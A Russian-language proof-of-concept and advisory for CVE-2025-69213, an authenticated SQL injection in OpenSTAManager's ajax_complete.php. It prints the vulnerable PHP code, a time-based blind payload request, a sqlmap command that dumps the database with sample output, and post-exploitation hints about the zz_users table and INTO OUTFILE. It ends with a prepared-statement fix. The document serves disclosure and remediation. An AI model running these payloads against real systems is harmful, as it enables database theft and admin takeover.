
Репозиторий proof-of-concept для CVE-2025-69213, демонстрирующий уязвимость SQL-инъекции в конечной точке ajax_complete.php в OpenSTAManager с эксплуатацией методом временной слепой инъекции и руководством по устранению.
| Поле | Сведения |
|---|
| Идентификатор CVE | CVE-2025-69213 |
| Серьёзность | ВЫСОКАЯ |
| Уведомление | Посмотреть уведомление |
| Обнаружено | Lukasz Rybak |
Уязвимость SQL-инъекции существует в конечной точке ajax_complete.php при обработке операции get_sedi. Аутентифицированный злоумышленник может внедрить вредоносный SQL-код через параметр idanagrafica, что приведёт к несанкционированному доступу к базе данных.
Файл: modules/anagrafiche/ajax/complete.php:28
case 'get_sedi':
$idanagrafica = get('idanagrafica');
$q = "SELECT id, CONCAT_WS( ' - ', nomesede, citta ) AS descrizione
FROM an_sedi
WHERE idanagrafica='".$idanagrafica."' ...";
$rs = $dbo->fetchArray($q);
$_GET['idanagrafica'] → get('idanagrafica')$dbo->fetchArray($q) выполняет вредоносный запрос.Ручное доказательство (Time-based Blind SQLi):
GET /ajax_complete.php?op=get_sedi&idanagrafica=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>

Эксплуатация с помощью SQLMap:
sqlmap -u "http://localhost:8081/ajax_complete.php?op=get_sedi&idanagrafica=1*" \
--cookie="PHPSESSID=<session>" \
--dbms=MySQL \
--technique=T \
--level=3 \
--dump
Вывод SQLMap:
[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: idanagrafica=1' AND (SELECT 2572 FROM (SELECT(SLEEP(5)))oOnc)-- rhVF
back-end DBMS: MySQL >= 5.0.12

zz_users для получения доступа администратора.SELECT ... INTO OUTFILE, если разрешения файловой системы позволяют.Замените прямую конкатенацию на подготовленные выражения:
До:
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica='".$idanagrafica."' ...";
После:
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica=".prepare($idanagrafica)." ...";
Обнаружено: Łukasz Rybak
Этот CVE был ответственно раскрыт в соответствии с практикой скоординированного раскрытия уязвимостей. Предоставленная информация предназначена только для образовательных и защитных целей.